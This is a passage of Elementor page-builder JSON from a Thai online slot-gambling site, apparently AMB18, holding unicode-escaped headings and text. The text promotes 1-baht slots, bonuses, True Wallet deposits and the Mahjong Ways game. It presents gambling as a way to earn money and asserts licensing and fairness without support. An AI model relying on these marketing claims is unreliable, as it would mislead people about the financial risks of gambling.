oads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 